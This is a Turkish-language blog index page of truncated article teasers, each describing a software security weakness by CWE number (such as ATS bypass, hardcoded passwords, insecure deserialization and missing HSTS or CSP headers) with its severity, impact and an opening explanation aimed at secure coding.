|
| |
|
|
|
|
| Bu makalede App Transport Security Bypass (CWE-319), yani ATS Güvenliğinin Pasifleştirilmesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Hassas bilgilerin ele geçirilebilmesi
Açıklığın Açıklaması:
App Transport Security (ATS) iOS mobil uygulamalarda varsayılan olarak açık gelen, mobil uygulama ile back-end’i (arka ucu) veya mobil uygulama ile web servisleri arasında güvenli bağlantı kurmak için kullanılan bir b... [Devamı] |
| Bu yazı 19.10.2025 tarihinde, saat 04:30:43'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Array Declared Public, Final and Static (CWE-582), yani Dizilerin Public, Final ve Static Tanımlanması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Sabit dizilerin modifiye edilebilmesi
Açıklığın Açıklaması:
Uygulamalarda dizi nesneleri / değişkenleri public, final ve static tanımlanabilmektedir. final kullanımı umulduğu üzere dizinin modifiye edilmesini önler ama dizinin elemanlarının modifiye edilmesi... [Devamı] |
| Bu yazı 19.10.2025 tarihinde, saat 10:30:43'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Cacheable HTTPS Response (CWE-16), yani Önbelleklenebilir HTTPS Yanıtı açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Son kullanıcılar sistemlerindeki web tarayıcı yazılımları aracılığıyla çeşitli web sitelerine (sunucularına) talepte bulunduklarında web sunuculardan dönen https yanıtlarını bir klasör altında toplayabilmektedirler. Örneğin eğer ziyaret edilen web sunuc... [Devamı] |
| Bu yazı 19.10.2025 tarihinde, saat 14:03:46'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Cleartext Submission of Sensitive Information (CWE-319), yani Şifresiz İletişim Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Hassas bilgilerin ele geçirilebilmesi
Açıklığın Açıklaması:
Ağ üzerinde veri gönderme eğer iletişim kanalı güvenli bir protokolle korunmuyorsa risklidir. Özellikle güvensiz ağlara ve hotspot’lara sıklıkla bağlanan mobil cihazlar için bu durum daha da kritik öneme sahi... [Devamı] |
| Bu yazı 19.10.2025 tarihinde, saat 14:29:54'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Client Hardcoded Domain (CWE-829), yani Açık Bir Şekilde Alan Adı Kullanılması veya diğer bir ifadeyle Koda Alan Adı Yazılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Web uygulama güvenliğini üçüncü taraf web sunucuların güvenliğine bağımlı kılma
Açıklığın Açıklaması:
Javascript / CSS dosyaları HTML içerisine gömülürken uzak alan adlarından (yani external domain’lerden) dinamik olarak çekilerek k... [Devamı] |
| Bu yazı 19.10.2025 tarihinde, saat 15:00:13'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Client HTML5 Store Sensitive Data in Web Storage (CWE-922) (CWE-312), yani Hassas Verilerin LocalStorage'da Depolanması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Hassas verilerin ele geçirilebilmesi
Açıklığın Açıklaması:
localStorage bir HTML5 özelliğidir. İstemci tarafta veri depolamaya yarayan bir Javascript nesnesidir. Veriler key=value şeklinde token olarak istemci tarafın, yani web tarayıcının l... [Devamı] |
| Bu yazı 20.10.2025 tarihinde, saat 21:33:54'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Client Insecure Randomness (CWE-330), yani İstemcide Kriptografik Olmayan Zayıf PRNG Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Yetkisiz Erişim
Açıklığın Açıklaması:
Uygulama dünyasında oturum jetonları (session token’lar), eposta doğrulama linkleri, captcha gibi birçok alanda sözde rastgele sayı üreteçleri (yani PRNG - Pseudo Random Number Generator) kullanılmaktadır. Sözde rastgele say... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 00:25:39'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Client Use of iFrame Without Sandbox (CWE-829), yani iFrame'de Sandbox Kullanılmaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
XSS, oltalama ve clickjacking saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
iFrame ile güvenilmeyen, uzak bir kaynaktan bir web sayfaya sayfa gömmek genellikle bir mesuliyet gerektirir. Çünkü iframe ile hangi web sayfasına sayfa gömülmüşse o web sayfanın güvenl... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 01:10:34'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Confusing Naming (CWE-710), yani Kafa Karıştırıcı İsimlendirme Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenliğin sürdürülebilirliğinin azalması
Açıklığın Açıklaması:
Bir class (sınıf) instance variable’ının / field’ının (değişkeni) metot ismiyle aynı isme sahip olması sakıncalıdır. Field ve metotların aynı isim ile isimlendirilmesi kaynak kod okunurluğunu azaltır. Uygulama ge... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 03:43:08'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Connection String Injection (CWE-99), yani Bağlantı Dizesi Enjeksiyonu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Servis Dışı Bırakma
Açıklığın Açıklaması:
Uygulamalar bir veritabanı veya harici bir sunucu (örn; Active Directory) ile iletişim kurmak için dinamik bağlantı dizeleri (connection strings) oluşturabilirler. Dinamik bağlantı dizeleri girdilerin bağlantı dizelerine eklenmesiyle oluşan diz... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 03:52:25'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede CustomError (CWE-756), yani Web Uygulamaya Özel Hata Sayfası Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Web uygulamalar 404 Not Found, 400 Bad Request v.b. hata sayfalarında varsayılan hata sayfalarını yansıtmaktadırlar. Bu tarz varsayılan hata sayfalarında uygulamayla alakalı hassas veriler ifşa edilebilmektedir. Bir saldırgan bir istisnayı (exception’ı) ... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 04:19:26'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Dead Code: Expression is Always False (CWE-570), yani Ölü Kod: İfadenin Daima False Olması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama güvenliğinin sürdürebilirliğini azaltma
Açıklığın Açıklaması:
Uygulamalarda çalışmayan, işleve sahip olmayan kodlamalar yer alabilmektedir. Bu kodlar uygulamanın kod kalitesini düşürücü etkiye sahiptir. Uygulama zamanla büyüdükçe sonradan uygulama kaynak kodl... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 05:12:03'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Dead Code: Expression is Always True (CWE-571), yani Ölü Kod: İfadenin Daima True Olması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama güvenliğinin sürdürebilirliğini azaltma
Açıklığın Açıklaması:
Uygulamalarda çalışmayan, işleve sahip olmayan kodlamalar yer alabilmektedir. Bu kodlar uygulamanın kod kalitesini düşürücü etkiye sahiptir. Uygulama zamanla büyüdükçe sonradan uygulama kaynak kodları... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 05:24:00'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Debug Mode Enabled (CWE-11), yani "DEBUG" Modunun Açık Olması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Uygulama geliştirme sırasında geliştiriciler genellikle testing (test etme) ve debugging (hata ayıklama) faaliyetlerini kolaylaştırmak için özelleştirilmiş kodlamalarda bulunurlar. Bu testing ve debugging (hata ayıklama) kodları prod ortama deploy edilirlerse (d... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 05:35:40'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Overly Broad Catch (CWE-396), diğer bir ifadeyle Declaration of Catch for Generic Exception (CWE-396), yani Aşırı Geniş Catch Bloğu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenli yazılım altyapı eksikliği, Hata yönetimlerinden doğru geri besleme ve verim alamama
Açıklığın Açıklaması:
Programlama dillerinde çeşitli istisnalar meydana geldiğinde bu istisnaları yakalayan ve tanımlanacak işlemlerin uyg... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 07:43:14'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Overly Broad Throws (CWE-397), diğer bir ifadeyle Declaration of Throws for Generic Exception (CWE-397), yani Aşırı Geniş Throw Tanımlaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenli yazılım altyapı eksikliği, Hata yönetimlerinden doğru geri besleme ve verim alamama
Açıklığın Açıklaması:
Programlama dillerinde metot tanımlarında (fonksiyon tanımlarında) çeşitli istisnalar meydana geldiğin... [Devamı] |
| Bu yazı 21.10.2025 tarihinde, saat 13:06:41'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Deserialization of Untrusted Data (CWE-502), yani denetlenmemiş verinin tersine serileştirilmesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Uzaktan kod çalıştırma
Açıklığın Açıklaması:
Uygulamalar ihtiyaca göre serileştirme (serialization) ve deserileştirme (deserialization) işlemini kullanabilmekteler. Uygulama kaynak kodlarındaki bir veri yapısının veya nesnenin sonradan ağ üzerinden başka bir pla... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 01:25:49'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Detection of Error Condition without Action (CWE-390), yani Hata Yönetiminde Eylem Uygulanmaması, diğer bir ifadeyle Boş İstisna Bloğu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenliğin sürdürülebilirliğinin azalması
Açıklığın Açıklaması:
Bir istisna bloğu (örn; catch veya finally bloğu) kullanıldığında eğer blok boşsa bu durum uygulamanın güvenliğini etkiler. Catch ve Finally bloklarının boş bırakılma... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 01:52:04'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede "Directory Browse (CWE-548)", yani Dizin Görüntüleme açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas Dosyaların İfşası
Açıklığın Açıklaması:
Bir web uygulama dizin listelemeye izin verdiğinde bu durum kullanıcılara uygulama içerisindeki listelenen klasörleri ve dosyaları denetleme imkanı verir. Dizin listelemeyi aktifleştirmek geliştirici ortamında kabul edilebilir olsa da prod ortamda çoğunlukla ... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 02:57:51'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Empty Methods (CWE-398), yani Boş Metotlar açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenliğin sürdürülebilirliğinin azalması
Açıklığın Açıklaması:
Boş metot varlığı uygulamanın dikkatlice geliştirilmediğini ve bakımının yapılmadığını gösterir. Bu durum doğrudan bir güvenlik açıklığı oluşturmaz. Fakat tavsiye edilen uygulama kodlama standartlarının takip edilmediğini gösterir. Bu durum ise uygulama... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 03:05:57'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede "Empty Try Blocks (CWE-390)", yani Boş Try Blokları açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Dayanıklılık eksikliği
Açıklığın Açıklaması:
Bir try-catch-finally bloğu kullanıldığında eğer try bloğu boşsa bu durum uygulamanın güvenilir şekilde çalışmasını engeller.
Örneğin Java dilinde bu açıklığa sahip ve açıklığın kapatıldığı kod bloğu örnekleri verilmiştir.
JAVA - Güvensiz Hal (1):
... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 03:12:00'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede "Frameable Login Page (CWE-829)", yani Frame'lenebilir Oturum Açma Sayfası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Kurum (meşru) web sitesinin login sayfası koruma bulunmamaktaysa iframe ile saldırgan web sitelerine yerleştirilebilir. Saldırgana ait web sitede iframe ile sergilenen meşru web sitenin login sayfası üzerine saldırgan yarı opak / şeffaf kullanıcı ad... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 03:20:40'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Hardcoded Absolute Path (CWE-426), yani Açık Tam Dosya Yolu Kullanılması, diğer bir ifadeyle Koda Fiziksel Adres Girilmesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama güvenliğinin sürdürülebilirliğini azaltma
Açıklığın Açıklaması:
Açık tam dosya yolu kullanılması uygulamaları kırılgan yapar. Örneğin thick client (masaüstü) uygulamalar farklı farklı istemcilere (sistemlere/ortamlara) indirili... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 03:35:01'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Use of Hardcoded Password (CWE-798) (CWE-259), yani Kodda Açık Bir Şekilde Parola Bulundurulması, diğer ifadeyle Koda Şifre Yazılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Bilgi İfşası, Sızma girişimlerinde saldırının boyutunun artması
Açıklığın Açıklaması:
Uygulama geliştiricileri uygulama kaynak kodlarına parola bilgisi gömebilmektedirler. Bu hassas veriler ki... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 04:14:42'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Heap Inspection (CWE-244), yani Yığın Denetimi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Gizlilik İhlali
Açıklığın Açıklaması:
Uygulamalar tarafından bellekte şifrelenmeden depolanan tüm değişkenler / nesneler kötü niyetli kullanıcılarca erişim sağlanarak elde edilebilir. Örneğin yetkili bir kötü niyetli sorumlu veya bir saldırgan çalışan process’e (işleme) bir debu... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 04:52:53'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Improper Exception Handling (CWE-248), yani Yakalanmamış İstisna açıklığı anlatılacatır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulamanın çökmesi, hassas verilerin ifşası, diğer beklenmedik davranışlar
Açıklığın Açıklaması:
Uygulamalarda zaman zaman uygulamaların normal akışını bozan istisnalar (exception'lar) meydana gelebilmektedir. Örneğin veritabanı, dosya erişimi gibi bazı işlemlerde istisnalar fırlayabilmektedir.... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 05:10:55'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Improper Resource Shutdown or Release (CWE-404), yani Uygunsuz Kaynak Kapatma veya Uygunsuz Serbest Bırakma açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Servis dışı kalma
Açıklığın Açıklaması:
Uygulamalar kaynak kodlarındaki kodlamalara göre bellekten alanlar ayırırlar. Örneğin kaynak kodda
bir eposta bağlantısı açılıyordur
bir veri tabanı bağlantısı açılıyordur
bir dosya açılıyordur
v.... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 05:17:49'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing Block Delimitation (CWE-483), yani blok sınırlandırma eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama güvenliğinin sürdürülebilirliğini azaltma
Açıklığın Açıklaması:
Programlama dillerinin bazısında blokları sınırlandırmak adına parantezler (veya diğer sınırlandırıcılar) isteğe bağlı şekilde kullanılır. Eğer bir blokta sınırlandırıcıya yer verilmiyorsa blokta olduğu düşünülen bi... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 05:29:45'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Exposure Through An Error Message (CWE-209), yani Hata Mesajı Yoluyla Bilgi İfşası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi ifşası, Saldırı metotlarını belirlemede kolaylık sağlama
Açıklığın Açıklaması:
Uygulamalar bulundukları ortamlar hakkında, kullanıcıları hakkında veya uygulamanın ilişkili verileri hakkında hassas bilgiler içeren hata mesajları oluşturabilirler. Bu hassas bil... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 07:10:41'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Exposure through Comments) (CWE-615), yani Yorumlar Yoluyla Bilgi İfşası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi ifşası
Açıklığın Açıklaması:
Uygulama geliştiricileri ürünlerini geliştirirken kaynak kodlarına yorum satırları girebilirler. Bu sayede binlerce, milyonlarca yazılan kod satırlarına bir süre sonra geri döndüklerinde "Ben burada ne yapmışım?" sorusuna karşılık koda tek... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 07:27:25'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Exposure Through Query String (CWE-598), yani Sorgu Dizeleri Yoluyla Bilgi İfşası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi ifşası
Açıklığın Açıklaması:
Web uygulamalarda URL’nin GET parametresi üzerinden hassas bilgi göndermek bu bilgilerin potansiyel olarak şu konumlarda yer almasıyla sonuçlanır:
son kullanıcı bilgisayarındaki web tarayıcı önbelleğinde (cache’inde)... [Devamı] |
| Bu yazı 23.10.2025 tarihinde, saat 08:09:02'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Exposure via Server Header (CWE-200), yani Server Başlığı Yoluyla Bilgi İfşası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
İsimler ve versiyon numaraları sıklıkla belirli bir teknoloji parçasının yaşam döngüsündeki belirli bir noktayı gösterir. Belirli teknolojilerin isimlerinin ve versiyon numaralarının harici kimselere ifşa edilmesi saldırganların bilin... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 00:34:58'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Exposure via X- Headers) (CWE-200), yani X- ile Başlayan Başlıklar Yoluyla Bilgi İfşası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
İsimler ve versiyon numaraları sıklıkla belirli bir teknoloji parçasının yaşam döngüsündeki belirli bir noktayı gösterir. Belirli teknolojilerin isimlerinin ve versiyon numaralarının harici kimselere ifşa edilmesi saldırganla... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 01:01:09'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Information Leak Through Shell Error Message Açıklığı (CWE-535), yani Kabuk Hata Mesajı Yoluyla Bilgi Sızıntısı açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Geliştiricilerin bazı zamanlar hata ayıklama veya geçici günlük kaydı tutmak için kullandıkları konsol çıktıları sıklıkla güvenli çıktı akışı açısından yanlış bir tercih olarak öne çıkmaktadır. Konsol çıktılar... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 01:11:23'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Input Path Not Canonicalized (CWE-73) (CWE-36) (CWE-23) (CWE-22), yani Doğrulanmamış Yol Girdisi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Hassas Dosyaların Çalınması, SSRF saldırısı düzenlenmesi
Açıklığın Açıklaması:
Uygulamalar tasarımı gereği bazen kullanıcı girdisi ile bir dosya yolu bilgisi alabilmektedirler. Uygulamalar bu şekilde uygulama sunucusunun yerel diskindeki dosyalara erişim imkanı su... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 01:20:07'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Insecure Cookie (CWE-614), yani Çerez İçeriğinin Korunaksız Olması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Oturum Bilgisinin Ele Geçirilmesi
Açıklığın Açıklaması:
Web uygulamalarının kullanıcılara dağıttıkları çerezlerde mutlaka HttpOnly bayrağı yer almalıdır. Bu bayrak web uygulamalarında istemci tarafındaki javascript kodlarının kullanıcı çerezlerine erişimini engellemektedir. Böylece web uygula... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 01:49:03'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Insufficient Logging of Exceptions (CWE-778), yani İstisnaların Yetersiz Log'lanması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenlik açıklarının saptanamaması
Açıklığın Açıklaması:
Uygulamalarda zaman zaman uygulamaların normal akışını bozan istisnalar (exception'lar) meydana gelebilmektedir. Güvenlik aktivitelerinden gelen istisnalar (exception'lar) meydana geldiğinde uygulama güvenliğine dönük ... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 02:04:12'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Insufficient Logging of Sensitive Operations (CWE-778), yani Hassas İşlemlerin Yetersiz Log'lanması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenlik açıklarının saptanamaması
Açıklığın Açıklaması:
Uygulamalarda oturum açma, veri tabanı bağlantısı kurma veya sorgusu çalıştırma gibi hassas işlemler gerçekleştirildiğinde bu işlemler log’lanmalıdırlar. Eğer bu v.b. hassas işlemlerin her biri log ile... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 02:11:38'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Integer Overflow (CWE-190), yani Integer Taşması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
işlevlerin uygun çalışmaması, servis dışı kalma, komut çalıştırma
Açıklığın Açıklaması:
Uygulamalarda kaynak kodlarda yer alabilen aritmetik işlemlerde yaşanan taşmalar veri bozulmalarına (örn; değer hesaplamalarında maksimum değerlerin minimum değer olmasına), sistemlerin çökmesine, sonsuz döngüler oluşması... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 03:03:00'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Integer Underflow (CWE-191), yani Integer Düşmesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
işlevlerin uygun çalışmaması, servis dışı kalma, komut çalıştırma
Açıklığın Açıklaması:
Uygulamalarda kaynak kodlarda yer alabilen aritmetik işlemlerde yaşanan taşmalar veri bozulmalarına (örn; değer hesaplamalarında maksimum değerlerin minimum değer olmasına), sistemlerin çökmesine, sonsuz döngüler oluşmas... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 03:09:21'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Log Forging (CWE-117), yani Log Taklit Etme, diğer bir ifadeyle Log Enjeksiyonu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama verisini modifiye etme, aktiviteleri gizleme, yetkisiz kod veya komutlar çalıştırma
Açıklığın Açıklaması:
Uygulamalar bir hata meydana geldiğinde hata ayıklama için veya saldırı meydana geldiğinde gereken aksiyonu belirlemek için log kaydı alma mekanizmalarını kullanırl... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 03:12:57'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing CSP Header (CWE-16), yani Eksik CSP Başlığı, diğer bir ifadeyle; Güncel Web Tarayıcılarda XSS Saldırılarına Karşı Koruma Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
XSS saldırılarına karşı savunmasız kalma, Clickjacking saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
Content-Security-Policy yanıt başlığı güncel web tarayıcılarda XSS saldırılarını önleyen bir http güvenlik ... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 03:46:05'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing CSP in Spring (CWE-346), yani Spring Framework'ünde CSP Kullanımı Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
XSS saldırılarına karşı savunmasız kalma, Clickjacking saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
Content-Security-Policy yanıt başlığı güncel web tarayıcılarda XSS saldırılarını önleyen bir http güvenlik başlığıdır. Web tarayıcılarının görüntülediği web uy... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 04:06:09'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing Default Case in Switch Statement (CWE-478), yani Switch İfadesinde Default Durumun Olmaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Güvenliğin sürdürülebilirliğinin azalması
Açıklığın Açıklaması:
Programlama dillerinde switch ifadesi bir ifadeyi belirli sayıda duruma karşı eşleşme kıyaslamasına tabi tutma ve eşleşilen duruma dallanma, sonra da break komutu ile dallanmayı sonlandırma işlemi... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 04:18:41'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing HSTS Header (CWE-346), yani HSTS Başlığı Kullanımı Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
SSLStrip saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
SSLStrip, diğer adıyla HTTPS-den-Http-ye-İndirgeme kullanıcıların web uygulamasını https üzerinden kullanması gerekirken http üzerinden kullanmasına sebep olan bir saldırı türüdür. Saldırı kabaca yerel ağdaki bir kullanıcı i... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 04:44:21'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing HSTS in Spring (CWE-346), Spring Framework'ünde HSTS Kullanımı Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
SSLStrip saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
SSLStrip, diğer adıyla HTTPS-den-Http-ye-İndirgeme kullanıcıların web uygulamasını https üzerinden kullanması gerekirken http üzerinden kullanmasına sebep olan bir saldırı türüdür. Saldırı kabaca yerel ağdaki bir... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 05:02:19'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing Jailbreak Check (CWE-693), yani Jailbreak Kontrolü Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulamaya dair son kullanıcı bilgilerinin saldırganlarca elde edilebilmesi, uygulama sunucusuna kurban son kullanıcı üzerinden saldırılar yapılabilmesi
Açıklığın Açıklaması:
Jailbreak iOS mobil cihazların sistem güvenlik kilidinin kullanıcısı tarafından kırılarak telefona her yönüyle hükme... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 05:14:01'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing or Insecure X-XSS-Protection Header (CWE-16), yani Eksik veya Güvensiz X-XSS-Protection Başlığı, diğer bir ifadeyle; Eski Web Tarayıcılarda Betik Kodlarını Pasifleştirme Saldırılarına Karşı Koruma Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas bilgilere yetkisiz erişim, Uzaktan kod çalıştırma, Javascript Kod Pasifleştirme
Açıklığın Açıklaması:
X-XSS-Protection yanıt başlığı eski ... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 07:33:44'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing Referrer-Policy Header (CWE-16), yani Eksik Referrer-Policy Başlığı, diğer ifadeyle; Link ve Parametre Gizliliğinin Sağlanmaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Kurum web uygulaması arayüzündeki bir linkten farklı bir web uygulama sunucusuna gidildiğinde kullanıcının mevcut kurum web uygulamasındaki link ve paremetreleri farklı web uygulama sunuc... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 07:54:52'de yazılmıştır. |
|
| |
|
|
|
|
